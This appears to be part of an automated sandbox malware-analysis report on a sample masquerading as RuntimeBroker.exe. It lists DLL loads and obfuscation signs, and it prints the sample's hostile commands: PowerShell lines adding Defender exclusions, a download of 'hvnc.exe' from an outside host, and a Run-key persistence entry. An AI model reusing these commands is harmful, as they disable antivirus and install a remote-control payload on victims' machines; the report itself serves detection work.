            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, CQvMD0daJJ1yJw1vJfR.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            .NET source code contains potential unpacker
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
            Suspicious powershell command line found
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')"
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String'
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String'Jump to behavior
            Source: RuntimeBroker.exe.10.drStatic PE information: 0xE4DEA2AC [Wed Sep 5 01:58:04 2091 UTC]
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 11_2_00007FF848F100BD pushad ; iretd 11_2_00007FF848F100C1
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 11_2_00007FF848F156EC push esp; iretd 11_2_00007FF848F156ED
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 11_2_00007FF848F14708 push ebp; retf 11_2_00007FF848F14758
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 11_2_00007FF848FD0644 pushfd ; retf 11_2_00007FF848FD065A
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 11_2_00007FF848FD0CB0 pushfd ; retf 11_2_00007FF848FD0CEA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848F300BD pushad ; iretd 12_2_00007FF848F300C1
            Source: RuntimeBroker.exe.10.drStatic PE information: section name: .text entropy: 7.994165630489083
            Source: RuntimeBroker.exe.11.drStatic PE information: section name: .text entropy: 7.994165630489083
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, BasicList.csHigh entropy of concatenated method names: 'Reset', 'MoveNext', 'fWGSNCHRjxQ2T4Fywo0', 'fcUiKNHh63sdcETdT8P', 'RemoveLastWithMutate', 'Append', 'Trim', 'IndexOfString', 'IndexOfReference', 'IndexOf'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, Lmg5B2r5iOTobXbK5P.csHigh entropy of concatenated method names: 'bEHO6sR6a8', 'FWdOAmx6wkcOo3ZxZC7', 'IvAkvhxqpXLth8nM5QF', 'H6ld3Q3Ait', 'NsImFGHnIeCpxY9oEFi', 'NNnF6mHoct6qKkQ8tv0', 'NInM8IdOa', 'IZrVaKfOw', 'eFZcOjpdI', 'jStmZT3bg'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, EnumSerializer.csHigh entropy of concatenated method names: 'VOC37tH1bDEEDetwHT8', 'Mesv5OHT0etgJekTYPo', 'GetTypeCode', 'EnumToWire', 'WireToEnum', 'Read', 'Write', 'EmitWrite', 'EmitRead', 'WriteEnumValue'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, ListDecorator.csHigh entropy of concatenated method names: 'CanPack', 'Create', 'EmitRead', 'EmitReadList', 'EmitReadAndAddItem', 'GetEnumeratorInfo', 'GetEnumeratorInfo', 'EmitWrite', 'Write', 'CanUsePackedPrefix'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, TupleSerializer.csHigh entropy of concatenated method names: 'HasCallbacks', 'EmitCallback', 'Callback', 'CreateInstance', 'GetValue', 'Read', 'Write', 'GetMemberType', 'CanCreateInstance', 'EmitWrite'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, ImmutableCollectionDecorator.csHigh entropy of concatenated method names: 'ResolveIReadOnlyCollection', 'CheckIsIReadOnlyCollectionExactly', 'IdentifyImmutable', 'Read', 'EmitRead', 'PEHOHZKOK63dgkM1IO7', 'FyvOy9KuLni6rABE9QQ', 'HsP38fKa2bO0ck2dnqc', 'TiME9oKdjETd5k0IA3g', 'WGEkHbKNxUWJXAMGXVj'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, TypeSerializer.csHigh entropy of concatenated method names: 'HasCallbacks', 'CanCreateInstance', 'CreateInstance', 'Callback', 'GetMoreSpecificSerializer', 'Write', 'Read', 'InvokeCallback', 'CreateInstance', 'EmitWrite'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, ArrayDecorator.csHigh entropy of concatenated method names: 'CanUsePackedPrefix', 'CanUsePackedPrefix', 'EmitWrite', 'EmitWriteArrayLoop', 'Write', 'Read', 'EmitRead', 'jC9J9eFOA6svKL0Tiyu', 'TOpiW9Fuhxequy2NQZ7', 'aX3x8EFaSi22L5q8bo6'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, NullDecorator.csHigh entropy of concatenated method names: 'EmitRead', 'EmitWrite', 'Read', 'Write', 'rrmgLfDXPoFVrbdRCu9', 'rMoJEGDWK2Oi98uAx34', 'pykRv5Dbi9slyZySH2Q', 'D2d9UaDLc7FLWw7fb9r', 'WNe09nDffwoYnXOQwW9', 'elW3cSDepGluf20nJa1'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, kN4mjkPjyVP9o3ItpY.csHigh entropy of concatenated method names: 'Read', 'bN0mfnhX0Vct8p5KTvI', 'CUC2PlhLEuIfgWub6ip', 'rMETrFhfgBcAlves28k', 'CDEbu9hesUQEkQNvwZU', 'L3RUZ3huZLsAifY54QB', 'HA47ulhWKVfJJQMJ59v', 'V5W66ehbsY344RcbSJo'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, Esqa5xAfgtSAA74hpW7.csHigh entropy of concatenated method names: 'kfcAPjSxVP', 'owLABsml3f', 'rcLApseElL', 'PTdA8VNeUI', 'mxqA4CFMWP', 'hVTArvJ28l', 'HAuAEBtPt6', 'tNGAMdHj6K', 'e5wAV7cTsQ', 'm5SAcBB7w8'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, CQvMD0daJJ1yJw1vJfR.csHigh entropy of concatenated method names: 'bxWaf46naSp4xHqT5r8', 'SOPIB86o8NUjLSWuvuy', 'pqENZChw7q', 'g38PJ8K3c0', 'okpNHR3UyF', 'vKrNjYP7oe', 'T0FN6Aerx4', 'nQVNqUdbj1', 'UAlonv9EFMm', 'Kavddwscrk'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, Wfbie6o2QsljQ9VwRK9.csHigh entropy of concatenated method names: 'OuodbUPYpG', 'PvdRLUH2WHVKfco5pSB', 'Wfg4RlHkTsDqtubROsK', 'jhyoN2s7cb', 'wfboAfOCNA', 'hJJoQRbX05', 'blXo7wZLnB', 'hIKoWNn1NQ', 'X1pobHsPWj', 'J0LoXoUAjx'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, wtmNqEOLToFd0OAR48g.csHigh entropy of concatenated method names: 'XXuOldixYp', 'vZhOPyG5Gt', 't9YOiWCx1L', 'T0vOQmkdlB', 'nJTOeawnQD', 'sQROuSr3SW', 'EjGOa1np7o', 'Rc2OOaPWuT', 'MDgOdQ1kGA', 'XIYONW1Auu'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, QNPVv61TbvqMjbkf2F.csHigh entropy of concatenated method names: 'vmn0NnEgE', 'ProcessorId', 'wcUGVc3bg', 'twPIvsvcp', 'JFSSYqM9J', 'YHBRTTymO', 'UCbyWchBb', 'EchhqqkNT', 'ToWgGtVPX', 'BXm947nYY'
            Source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, bF2BgwAmW4F4SupPVnt.csHigh entropy of concatenated method names: 'ALXBz2oFGf', 'nIjpnf5hVZ', 'qu2potWvyE', 'vFap3Rw3eH', 'k44pCNHPwP', 'hFupw6bhoT', 'qAtpYcuvac', 'qfmAqpErCd', 'lMYp2cueo8', 'UuipkVUf2K'

            Persistence and Installation Behavior

            barindex
            Tries to download and execute files (via powershell)
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeFile created: C:\Users\user\AppData\Roaming\RuntimeBroker.exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
